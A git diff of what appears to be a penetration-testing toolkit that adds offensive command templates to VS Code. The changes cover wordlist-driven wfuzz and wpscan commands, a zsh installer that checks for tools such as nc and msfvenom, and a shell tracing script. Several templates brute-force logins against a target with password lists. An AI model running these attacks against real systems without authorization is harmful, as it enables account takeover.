${SECLIST}/Usernames/top-usernames-shortlist.txt -t "$TARGET" "$PORT" diff --git a/completion_indexer/wfuzz b/completion_indexer/wfuzz index 7afd75f..5ff9d57 100644 --- a/completion_indexer/wfuzz +++ b/completion_indexer/wfuzz @@ -1,5 +1,5 @@ -wfuzz --hc 401 -c -v -w /usr/share/seclists/Usernames/top-usernames-shortlist.txt -w /usr/share/seclists/Passwords/darkweb2017-top100.txt --basic "FUZZ:FUZ2Z" -u "http://$TARGET/secretpage" -wfuzz --hc 403,404 -c -w /usr/share/seclists/Discovery/Web-Content/big.txt -w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt -u "http://$TARGET/FUZZFUZ2Z" +wfuzz --hc 401 -c -v -w ${SECLIST}/Usernames/top-usernames-shortlist.txt -w ${SECLIST}/Passwords/darkweb2017-top100.txt --basic "FUZZ:FUZ2Z" -u "http://$TARGET/secretpage" +wfuzz --hc 403,404 -c -w ${SECLIST}/Discovery/Web-Content/big.txt -w ${SECLIST}/Discovery/Web-Content/web-extensions.txt -u "http://$TARGET/FUZZFUZ2Z" wfuzz --hh 185 -c -w `fzf-wordlists` -H 'Host: FUZZ.machine.org' -u "http://$TARGET/" wfuzz --hh 185 -c -w `fzf-wordlists` -H 'Host: FUZZ.org' -u "http://$TARGET/" wfuzz -c --hw 157 -L -w `fzf-wordlists` -w `fzf-wordlists` -X POST -d 'username=FUZZ&password=FUZ2Z' -u "http://$TARGET/admin" diff --git a/completion_indexer/wpscan b/completion_indexer/wpscan index 1740fec..686bee5 100644 --- a/completion_indexer/wpscan +++ b/completion_indexer/wpscan @@ -1,3 +1,6 @@ wpscan --api-token APITOKEN --url "http://$TARGET/" --no-banner --enumerate u1-20 wpscan --api-token APITOKEN --url "http://$TARGET/" --no-banner --plugins-detection aggressive -wpscan --api-token APITOKEN --url "http://$TARGET/" --no-banner --plugins-version-detection passive --password-attack xmlrpc -U 'admin' -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt +wpscan --api-token APITOKEN --url "http://$TARGET/" --no-banner --plugins-version-detection passive --password-attack xmlrpc -U 'admin' -P ${SECLIST}/Passwords/darkweb2017-top1000.txt +wpscan --url "http://$TARGET/" --no-banner --enumerate u1-20 +wpscan --url "http://$TARGET/" --no-banner --plugins-detection aggressive +wpscan --url "http://$TARGET/" --no-banner --plugins-version-detection passive --password-attack xmlrpc -U 'admin' -P ${SECLIST}/Passwords/darkweb2017-top1000.txt diff --git a/craft.py b/craft.py index 867c99e..d080153 100755 --- a/craft.py +++ b/craft.py @@ -22,6 +22,8 @@ def create_value_map(filepath:str): variable_file_content_map = {} files = os.listdir(filepath) for file in files: + if file in [".command_history"]: + continue curr_file = os.path.join(filepath, file) if os.path.isfile(curr_file): variable_file_content_map[curr_file] = read_file_return_base64ed_content(curr_file) diff --git a/installer.sh b/installer.sh index 4d5290a..5ddaf1b 100755 --- a/installer.sh +++ b/installer.sh @@ -1,22 +1,118 @@ #!/bin/zsh -if [[ -d ~/.local/weapon ]]; then - echo "Weapon already installed." - exit 0 -fi - -export LOCATION=~/.local/weapon -echo "Installing Weapon..." -mkdir -p $LOCATION && echo "Weapon directory created at $LOCATION." -cp -f ./createhackenv.sh $LOCATION && echo "createhackenv.sh copied to $LOCATION." -cp -f ./zsh_history $LOCATION && echo "zsh_history copied to $LOCATION." - -grep -zq "source $LOCATION/createhackenv.sh" ~/.zshrc -if [[ $? -eq 0 ]]; then - echo "createhackenv.sh already sourced in ~/.zshrc. sktpping..." -else - echo "Sourcing createhackenv.sh in ~/.zshrc..." - echo "source $LOCATION/createhackenv.sh" >> ~/.zshrc -fi - -echo "Weaponized VSCode installation completed." \ No newline at end of file +function check_command() { + command -v "$1" >/dev/null 2>&1 || { + echo "detect $1 is not installed." + echo "$2" + return 2 + } +} + +function check_requirements() { + check_command "awk" "awk is required for parsing the output of commands, please install it." || return 2 + check_command "sed" "sed is required for parsing the output of commands, please install it." || return 2 + check_command "grep" "grep is required for parsing the output of commands, please install it." || return 2 + check_command "tr" "tr is required for parsing the output of commands, please install it." || return 2 + check_command "zsh" "zsh is core to WeaponizedVSCode integrated shell." || return 2 + check_command "vim" "vim is required for task edit /etc/hosts, please install it or change it." || return 2 + check_command "nc" "nc is core for netcat shell session handling or u can't use it, please install it." || return 2 + check_command "rlwrap" "rlwrap is required for netcat shell session handling, please install it" || return 2 + check_command "msfvenom" "You will not have meterpreter shell or msfconsole feature in vscode integrated terminal." || return 2 + check_command "code" "Visual Studio Code is required for WeaponizedVSCode, please for sure your 'code' command is available in PATH." || return 2 + check_command "yq" "yq is required for parsing YAML content to environment variable, install it with 'brew install yq' or 'apt install yq'." || return 2 + check_command "simplehttpserver" "simplehttpserver is cool for serving files with upload feature and dump http requests, install it with https://github.com/projectdiscovery/simplehttpserver" || return 2 + check_command "rustscan" "rustscan is required for the auto scanning task in vscode, fast and reliable, install it with https://github.com/bee-san/RustScan" || return 2 + check_command "wfuzz" "wfuzz is required for command wfuzz_vhost_https and wfuzz_vhost_http, to fuzz the subdomain and vhost. install it or u can't use that" || return 2 + check_command "hashcat" "hashcat is required for the hashcat cracking task in vscode, install it with 'apt install hashcat' or 'brew install hashcat'." || return 2 + check_command "python3" "Python3 is required for the Python scripts in WeaponizedVSCode, please install it." || return 2 + check_command "uv" "uv is optional but recommended for better performance, install it with 'pip install uv'. Their script is useful" +} + +export INSTALL_IDENTIFIER="WeaponizedVSCode installation script. The following commands are generated by WeaponizedVSCode installer." + +function args() { + while [[ "$#" -gt 0 ]]; do + case "$1" in + (--trace-mode) + export WEAPON_TRACE_MODE=true + shift + ;; + (--force-install) + export WEAPON_FORCE_INSTALL=true + shift + ;; + *) + echo "Unknown option: $1" + exit 1 + ;; + esac + done +} + +function main() { + check_requirements + if [[ $? -ne 0 && "$FORCE_INSTALL" != "true" ]]; then + echo "Please install the required commands to continue." + echo "If you want to force install without checking requirements, run the script with FORCE_INSTALL=true ./installer.sh" + exit 1 + fi + + if [[ -z "$WEAPON_LOCATION" ]]; then + echo "WEAPON_LOCATION is not set. set to default ~/.local/weapon" + export WEAPON_LOCATION=~/.local/weapon + echo "You can set it by exporting WEAPON_LOCATION=your_desired_path before running this script." + fi + + if [[ -d "$WEAPON_LOCATION" ]]; then + echo "Weapon already installed." + if [[ "$WEAPON_FORCE_INSTALL" == "true" ]]; then + echo "Force install mode enabled, removing existing Weapon directory at $WEAPON_LOCATION." + rm -rf "$WEAPON_LOCATION" + else + echo "If you want to reinstall Weapon, please remove the existing directory at $WEAPON_LOCATION or use --force-install option." + exit 0 + fi + fi + + export LOCATION="$WEAPON_LOCATION" + echo "Weapon will be installed to $LOCATION, Press Enter key to continue or Ctrl+C to cancel..." + read + echo "Installing Weapon..." + mkdir -p $LOCATION && echo "Weapon directory created at $LOCATION." + cat ./createhackenv.sh |sed -e "s#__REPLACE__#$LOCATION#g" > $LOCATION/createhackenv.sh && echo "createhackenv.sh copied to $LOCATION." + cp -f ./zsh_history $LOCATION && echo "zsh_history copied to $LOCATION." + + if [[ "$WEAPON_TRACE_MODE" == "true" ]];then + cp -f ./zsh_preformance_tracer.sh $LOCATION && echo "zsh_performance_tracer is copied to $LOCATION." + fi + + grep -zq "${INSTALL_IDENTIFIER}" ~/.zshrc + if [[ $? -eq 0 ]]; then + echo "createhackenv.sh already sourced in ~/.zshrc. sktpping..." + else + echo "Sourcing createhackenv.sh in ~/.zshrc..." + cp ~/.zshrc ~/.zshrc.pre-weaponized-vscode && echo "Backup ~/.zshrc to ~/.zshrc.pre-weaponized-vscode" + + if [[ "$WEAPON_TRACE_MODE" == "true" ]]; then +cat<> ~/.zshrc + +# ${INSTALL_IDENTIFIER} +[[ -f $LOCATION/zsh_preformance_tracer.sh ]] && source $LOCATION/zsh_preformance_tracer.sh && zsh_trace_start +[[ -f $LOCATION/createhackenv.sh ]] && source $LOCATION/createhackenv.sh +[[ -f $LOCATION/zsh_preformance_tracer.sh ]] && zsh_trace_end +EOF + else +cat<> ~/.zshrc + +# ${INSTALL_IDENTIFIER} +[[ -f $LOCATION/createhackenv.sh ]] && source $LOCATION/createhackenv.sh +EOF + fi + + fi + + echo "Weaponized VSCode installation completed." +} + +args "$@" +main diff --git a/launch_helper.zsh b/launch_helper.zsh index b155480..d349364 100755 --- a/launch_helper.zsh +++ b/launch_helper.zsh @@ -1,6 +1,8 @@ +export WEAPON_LOCATION=__REPLACE__ + weapon_vscode_launch_helper () { - if [ -f ~/.local/weapon/zsh_history ]; then - export HIST_COMMAND_INDEXER=~/.local/weapon/zsh_history + if [ -f ${WEAPON_LOCATION}/zsh_history ]; then + export HIST_COMMAND_INDEXER=${WEAPON_LOCATION}/zsh_history fi if [ -n "$PROJECT_FOLDER" ]; then if [ -f "$PROJECT_FOLDER/.vscode/.zshrc" ]; then diff --git a/releaser.py b/releaser.py index a94303c..bf2cd76 100755 --- a/releaser.py +++ b/releaser.py @@ -17,9 +17,10 @@ ## How to use it? 1. Download the script -2. source it -3. use function `createhack ` with the name of the file you want to open -4. vscode will Automatically open the folder +2. unzip the zip file +3. run ./installer.sh to install the weapon in to your ~/.local/weapon folder +4. use function `createhack ` with the name of the file you want to open +5. vscode will Automatically open the folder ## Script Hash diff --git a/zsh_preformance_tracer.sh b/zsh_preformance_tracer.sh new file mode 100644 index 0000000..08f5530 --- /dev/null +++ b/zsh_preformance_tracer.sh @@ -0,0 +1,30 @@ +export WEAPON_TRACE_LOG=/tmp/weapon_trace_log.$$ + +zsh_trace_start() { + echo "starting zsh tracing" + # set the trace prompt to include seconds, nanoseconds, script name and line number + # This is GNU date syntax; by default Macs ship with the BSD date program, which isn't compatible + if [[ $ZSH_VERSION > 4.3.11 ]]; then + zmodload zsh/datetime + setopt promptsubst + export PS4='+$EPOCHREALTIME %N:%i> ' + else + export PS4='+$(date "+%s:%N") %N:%i> ' + fi + # save file stderr to file descriptor 3 and redirect stderr (including trace + # output) to a file with the script's PID as an extension + exec 3>&2 2>$WEAPON_TRACE_LOG + # set options to turn on tracing and expansion of commands contained in the prompt + setopt xtrace prompt_subst + trap 'setopt xtrace' EXIT +} + +zsh_trace_end() { + # turn off tracing + unsetopt xtrace + # restore stderr to the value saved in FD 3 + exec 2>&3 3>&- + echo "zsh tracing done. See $WEAPON_TRACE_LOG for details." + trap 'unsetopt xtrace' EXIT +} +